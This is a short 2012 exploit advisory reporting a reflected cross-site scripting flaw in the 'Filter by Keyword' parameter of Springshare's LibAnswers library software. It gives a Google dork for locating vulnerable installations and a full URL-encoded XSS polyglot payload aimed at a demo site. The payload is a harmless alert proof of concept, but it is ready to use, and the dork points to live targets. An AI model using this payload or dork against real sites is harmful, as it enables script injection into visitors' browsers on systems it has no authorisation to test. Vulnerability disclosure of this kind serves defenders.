# Exploit Title: LibAnswers Springshare Library Cross Site Scripting
# Date: 6.02.2012
# Author: Sony
# Software Link: http://www.springshare.com/libanswers/
# Google Dorks: browse.php?tid= intext:Powered by Springshare
# Web Browser: Mozilla Firefox
# Blog: http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/libanswers-springshare-library-cross.html
..................................................................

Well, we have xss in Filter by Keyword:

Our xss code:

http://codepad.org/LqL68vIQ

Demo:

http://demo.libanswers.com/browse.php?tid=0&f=[our xss is here]

http://demo.libanswers.com/browse.php?tid=0&f=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E

http://1.bp.blogspot.com/-i-ou8k7YbpY/Ty__2hD11NI/AAAAAAAAAaw/DWcCzOLPwi4/s1600/libanswers.JPG


..................................................................

InSecurity.Ro

Because we care, we're security aware!